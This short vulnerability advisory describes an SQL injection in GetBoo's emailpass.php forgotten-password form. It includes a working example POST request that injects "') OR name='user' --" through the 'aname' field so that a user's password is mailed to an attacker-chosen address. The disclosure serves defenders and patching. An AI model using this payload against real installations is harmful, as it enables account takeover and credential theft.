#25 GetBoo Email Forgotten Password SQL injection

[Francois Milfeuille]

An attacker can leverage a POST to emailpass.php to send users passwords to an attacker-defined email address. This is done through an SQL injection vulnerability in the 'aname' field.

Example request

POST /getboo/emailpass.php HTTP/1.1
{snip}
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

aname=') OR name='user' -- &email=attacker@pwn.com&newBtn=New+Password%21